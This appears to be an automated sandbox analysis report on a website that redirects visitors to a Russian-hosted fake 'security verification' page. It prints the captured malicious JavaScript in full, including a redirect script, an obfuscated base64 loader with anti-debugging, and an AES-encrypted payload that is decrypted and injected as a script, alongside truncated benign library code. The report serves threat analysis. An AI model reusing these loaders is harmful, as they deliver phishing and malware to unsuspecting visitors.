| URL: https://francinecrowley.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://francinecrowley.com |
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "High-risk redirect behavior: Script redirects to a suspicious Russian domain (.ru) with obfuscated parameters. Uses random character generation and URL manipulation. Variable naming suggests intentional obfuscation. Location hash manipulation could be used for command and control or malicious redirects."
} |
SByaqYUyAIzREzjw = location.hash.substring(0);
let url = null;
if (!SByaqYUyAIzREzjw.includes('#')) {
url = "https://jbGw.yzvufnxc.ru/SNNgfwO/";
}
if (SByaqYUyAIzREzjw.includes('#')) {
url = "https://jbGw.yzvufnxc.ru/SNNgfwO/" + "#" + String.fromCharCode(Math.floor(Math.random() * (90 - 65 + 1)) + 65);
}
location.href = url+SByaqYUyAIzREzjw;
|
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "High-risk script with multiple red flags: uses atob() for obfuscation, contains an encoded suspicious URL (yzv...ru domain), includes anti-debugging measures, blocks security-related keyboard shortcuts, and uses document.write() for DOM manipulation. The code appears to be part of a malicious payload delivery system."
} |
/* The starting point of all achievement is desire. */
if(atob("aHR0cHM6Ly92ai55enZ1Zm54Yy5ydS9TTk5nZndPLw==") == "nomatch"){
document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCiNBTkJDVFVjeG15IGg0e21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOi41cmVtO2ZvbnQtd2VpZ2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI0FOQkNUVWN4bXkgaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI0FOQkNUVWN4bXkgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojQU5CQ1RVY3hteSBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI0FOQkNUVWN4bXkuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogOTZweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlnaHQ6IGF1dG87bWFyZ2luLWxlZnQ6IGF1dG87fQ0KI0FOQkNUVWN4bXkgLnRleHQtY2VudGVyIHt0ZXh0LWFsaWduOiBjZW50ZXIhaW1wb3J0YW50O30NCkBtZWRpYSAobWluLXdpZHRoOjk5MnB4KXsNCiNBTkJDVFVjeG15IC5jb2wtbGctNHtmbGV4OjAgMCBhdXRvO3dpZHRoOjMzLjMzMzMzMzMzJTt9DQp9DQojQU5CQ1RVY3hteSAuZGlzcGxheS00IHtmb250LXNpemU6IDEuMjVyZW0haW1wb3J0YW50O30NCiNBTkJDVFVjeG15IC5tdC0yIHttYXJnaW4tdG9wOiAwLjVyZW0haW1wb3J0YW50O30NCiNBTkJDVFVjeG15IC5oNCB7Zm9udC1zaXplOiBjYWxjKC45MDByZW0gKyAuM3Z3KTt9DQojQU5CQ1RVY3hteSAuanVzdGlmeS1jb250ZW50LWNlbnRlcntqdXN0aWZ5LWNvbnRlbnQ6Y2VudGVyIWltcG9ydGFudDt9DQojQU5CQ1RVY3hteS5tdC01e21hcmdpbi10b3A6M3JlbSFpbXBvcnRhbnQ7fQ0KI0FOQkNUVWN4bXkgLm10LTQge21hcmdpbi10b3A6IDFyZW0haW1wb3J0YW50O30NCiNBTkJDVFVjeG15ICNKY1dSb0xJaXBUIHtjb2xvcjogIzZjNzU3ZDtmb250LXNpemU6MTRweDttYXJnaW4tdG9wOiAuNXJlbTt9DQogICAgPC9zdHlsZT4NCiAgICA8c2NyaXB0Pg0KICAgIGlmIChuYXZpZ2F0b3Iud2ViZHJpdmVyIHx8IHdpbmRvdy5jYWxsUGhhbnRvbSB8fCB3aW5kb3cuX3BoYW50b20gfHwgbmF2aWdhdG9yLnVzZXJBZ2VudC5pbmNsdWRlcygiQnVycCIpKSB7DQogICAgICAgIHdpbmRvdy5sb2NhdGlvbiA9ICJhYm91dDpibGFuayI7DQp9DQpkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdrZXlkb3duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3MykgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNjcpIHx8DQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LnNoaWZ0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDc0KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzIpIHx8DQogICAgICAgIChldmVudC5tZXRhS2V5ICYmIGV2ZW50LmFsdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3MykgfHwNCiAgICAgICAgKGV2ZW50Lm1ldGFLZXkgJiYgZXZlbnQuYWx0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDY3KSB8fA0KICAgICAgICAoZXZlbnQubWV0YUtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkNCiAgICApIHsNCiAgICAgICAgZXZlbnQucHJldmVudERlZmF1bHQoKTsNCiAgICAgICAgcmV0dXJuIGZhbHNlOw0KICAgIH0NCn0pOw0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcignY29udGV4dG1lbnUnLCBmdW5jdGlvbihldmVudCkgew0KICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgcmV0dXJuIGZhbHNlOw0KfSk7DQooZnVuY3Rpb24gWUZ4aVdjdElnaigpIHsNCiAgICBsZXQgVUlDUVNGY2tFSyA9IGZhbHNlOw0KICAgIGNvbnN0IE1YTHhoVFJvQ1AgPSAxMDA7DQogICAgc2V0SW50ZXJ2YWwoZnVuY3Rpb24oKSB7DQogICAgICAgIGNvbnN0IElZYU9velFNYmcgPSBwZXJmb3JtYW |
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "High-risk script that loads crypto-js library and performs multiple layers of obfuscation (base64 encoding, AES encryption) to ultimately decode and execute dynamic code via script injection. The use of crypto libraries for obfuscation rather than legitimate encryption, combined with dynamic code execution, strongly suggests malicious intent."
} |
var ETKcefKWPmxmsSlD = document.createElement("script");
ETKcefKWPmxmsSlD.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");
document.head.append(ETKcefKWPmxmsSlD);
ETKcefKWPmxmsSlD.onload=function(){
var {a,b,c,d} = JSON.parse(atob("eyJhIjoieStEcmJhTXpxZkV6c1dka2VYNUFYZkhOOEh4Qk5Ha0Vrczg0dVkzWGg0R2ZTSWFIXC9ReHF6c1dKWDB0dHZYaGIrdEwyOUMzdlQ3dFEreXEyVUF4d3cweVJvazlxTGZnbXZ6XC9TdFZBbW1vcmtHdTA0ZVBUZlVWQ09URTNJV0ZXaGNOT1hGYjdndVlKWnA5bTdudUIrcXg2Mll5eUJUU1JGcFwvdkxOTkk5QUdMdWlBMjladGJZZ2FhblJPdlZFc2tDbHlCWHI5OGJaYWQ4VVNnNG9MclE2em9BcHo5TCtWWnFaS3RjU3pqcGg5QzVHYzRxMEdkRkkyQzFuSjZMamZkSkFySE82XC9LUHVBWnRGNlVXUEJhM2F1ZVdBVWtIZ0xXMWZ6YjByem5veStHbWxJajFidXIwZFBUSGRycHI0T085K29ySkJnWU9jWlhkY05KS1FaVW9wcEgwVXhwTzI1ZFlcL2ZNWmxkMTRpbDE5TVpoTjhQRDhRWkpjaEFaM052Z29nWlVwaGp2U3ozcnduQ25jM3hCa0QxQmc1dUFcLzRMV0NBcmo0NU54UldMenI4YmxkWVo5amFzY2I2dHZYa3hEdkh4dTNSQXYrOWg4eUdtRkx2MVVwbWpiWjNTVk1paFc3OW9heUZ0SGtHSHNBNjg3dnRvbWRHM1ZkVHJOdW91ZUlDUU5IOXhzc25zc2JpeWZDRWdQSFBMcVo4QzU1dWtReUhONkZsXC9Ha0lFQk9sUmlXTHpZOGZCTXYxUlVlK0pSaGNCSUcxYXg3N0tnd2thb3pPTXZzMExhUnByVUF4MU1iNllsOVBMOFRobThhaVZub3lOVWxDcnRxKzAxb2dtem5YdWpya0tIdkFoNE95MkhUVlFwUWJHR3Z4UWV5cEMxOHpzVkNHbVlpblZheE42NlFVdDY5bHQ0MkZWbUppR0pnIiwiYiI6ImNmYzdiOWFlM2QwMWVjNDNhY2JjOWVjYzI1NjY1ZjA4IiwiYyI6ImI2YTNjMGRiNjk5YjVlZWYwMzhjMmRiM2ViZDUyYWU3IiwiZCI6IjMzMzk2NTY0Mzg2MzM2MzA2NDY1NjU2NjYxMzEzNDMwMzg2NDY0MzIzOTYyMzczNDM1NjU2NjY0MzQzMDM1NjIifQ=="));
var tPFMznpYYqZakcgL = CryptoJS.PBKDF2(CryptoJS.enc.Hex.parse(d),CryptoJS.enc.Hex.parse(b),{hasher:CryptoJS.algo.SHA512,keySize:64/8,iterations:999});
tcdzyoZvgTgfirsL = CryptoJS.AES.decrypt(a,tPFMznpYYqZakcgL,{iv:CryptoJS.enc.Hex.parse(c)}).toString(CryptoJS.enc.Utf8);
const NWVeyiNsRYBrpBLk = document.createElement("script");
NWVeyiNsRYBrpBLk.textContent = atob(tcdzyoZvgTgfirsL);
document.body.appendChild(NWVeyiNsRYBrpBLk);
}
|
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This appears to be a legitimate cryptography library implementation (likely CryptoJS). While it uses complex code patterns, it's focused on standard cryptographic operations using native crypto modules when available. The code includes proper error handling and standard crypto implementations without any suspicious external communications or data exfiltration attempts."
} |
!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null,e};function n(){}var e={},o=e.lib={},s=o.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();return t.init.apply(t,arguments),t},init:function(){},mixIn:function(t){for(var e in t)t.hasOwnProperty(e)&&(this[e]=t[e]);t.hasOwnProperty("toString")&&(this.toString=t.toString)},clone:function(){return this.init.prototype.extend(this)}},f=o.WordArray=s.extend({init:function(t,e){t=this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||a).stringify(this)},concat:function(t){var e=this.words,r=t.words,i=this.sigBytes,n=t.sigBytes;if(this.clamp(),i%4)for(var o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:function(){var t=s.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(i());return new f.init(e,t)}}),c=e.enc={},a=c.Hex={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push((o>>>4).toString(16)),i.push((15&o).toString(16))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i+=2)r[i>>>3]|=parseInt(t.substr(i,2),16)<<24-i%8*4;return new f.init(r,e/2)}},h=c.Latin1={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push(String.fromCharCode(o))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i++)r[i>>>2]|=(255&t.charCodeAt(i))<<24-i%4*8;return new f.init(r,e)}},d=c.Utf8={stringify:function(t){try{return decodeURIComponent(escape(h.stringify(t)))}catch(t){throw new Error("Malformed UTF-8 data")}},parse:function(t){return h.parse(unescape(encodeURIComponent(t)))}},u=o.BufferedBlockAlgorithm=s.extend({reset:function(){this._data=new f.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=d.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProcessBlock(i,h);e=i.splice(0,c),r.sigBytes-=a}return new f.init(e,a)},clone:function(){var t=s.clone.call(this);return t._data=this._data.clone(),t},_minBufferSize:0}),p=(o.Hasher=u.extend({cfg:s.extend(),init:function(t){this.cfg=this.cfg.extend(t),this.reset()},reset:function(){u.reset.call(this),this._doReset()},update:function(t){return this._append(t),this._process(),this},finalize:function(t){return t&&this._append(t),this._doFinalize()},blockSize:16,_createHelper:function(r){return function(t,e){return new r.init(e).finalize(t)}},_createHmacHelper:function(r){return function(t,e){return new p.HMA |
| URL: https://jbgw.yzvufnxc.ru/SNNgfwO/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Running security verification to protect your browser.",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": true,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This is the beginning of the legitimate jQuery library (version 3.6.0), a widely-used and trusted JavaScript framework. The code shows standard module pattern implementation, type checking, and core utility functions. No suspicious behaviors or security risks are present in this snippet."
} |
/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.6.0",S=function(e,t){return new S.fn.init(e,t)};function p(e){var t=!!e&&"length"in e&&e.length,n=w(e);return!m(e)&&!x(e)&&("array"===n||0===t||"number"==typeof t&&0<t&&t-1 in e)}S.fn=S.prototype={jquery:f,constructor:S,length:0,toArray:function(){return s.call(this)},get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(s.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:u,sort:t.sort,splice:t.splice},S.extend=S.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||m(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(S.isPlainObject(r)||(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i||S.isPlainObject(n)?n:{},i=!1,a[t]=S.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},S.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(p(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},makeArray:function(e,t){var n=t||[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,i,o=0,a=[];if(p(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&a.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&a.push(i);return g(a)},guid:1,support:y}),"function"==typeof Symbol&&(S.fn[Symbol.iterator]=t[Symbol.iterator]),S.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){n["[object "+t+"]"]=t.toLowerCase()});var d=function(n){var e,d,b,o,i,h,f,g,w,u,l,T,C,a,E,v,s,c,y,S="s |
| URL: https://jbgw.yzvufnxc.ru/SNNgfwO/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verifying...",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": true,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This appears to be a legitimate Cloudflare Turnstile implementation code (anti-bot/CAPTCHA service). While it contains obfuscated/minified code, this is standard for production JavaScript. The code references known Cloudflare domains and expected functionality like iframe handling and error codes."
} |
"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Sr(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function jt(e){if(Array.isArray(e))return e}function qt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function zt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return o}function Gt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Xt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
| URL: https://jbgw.yzvufnxc.ru/SNNgfwO/ Model: Joe Sandbox AI | {
"brands": []
} |
|
| URL: https://jbgw.yzvufnxc.ru Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://jbgw.yzvufnxc.ru |
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This appears to be a legitimate implementation of the CryptoJS library, a well-known cryptographic library. The code contains standard cryptographic operations, module exports handling, and secure random number generation. While it uses some dynamic code patterns, these are standard for this type of library and interact only with native crypto APIs. The code is minified but not maliciously obfuscated."
} |
!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();return t.init.apply(t,arguments),t},init:function(){},mixIn:function(t){for(var e in t)t.hasOwnProperty(e)&&(this[e]=t[e]);t.hasOwnProperty("toString")&&(this.toString=t.toString)},clone:function(){return this.init.prototype.extend(this)}},l=n.WordArray=o.extend({init:function(t,e){t=this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||c).stringify(this)},concat:function(t){var e=this.words,r=t.words,i=this.sigBytes,n=t.sigBytes;if(this.clamp(),i%4)for(var o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(var c=0;c<n;c+=4)e[i+c>>>2]=r[c>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=h.ceil(e/4)},clone:function(){var t=o.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{return i.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}());return new l.init(e,t)}}),s=t.enc={},c=s.Hex={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var 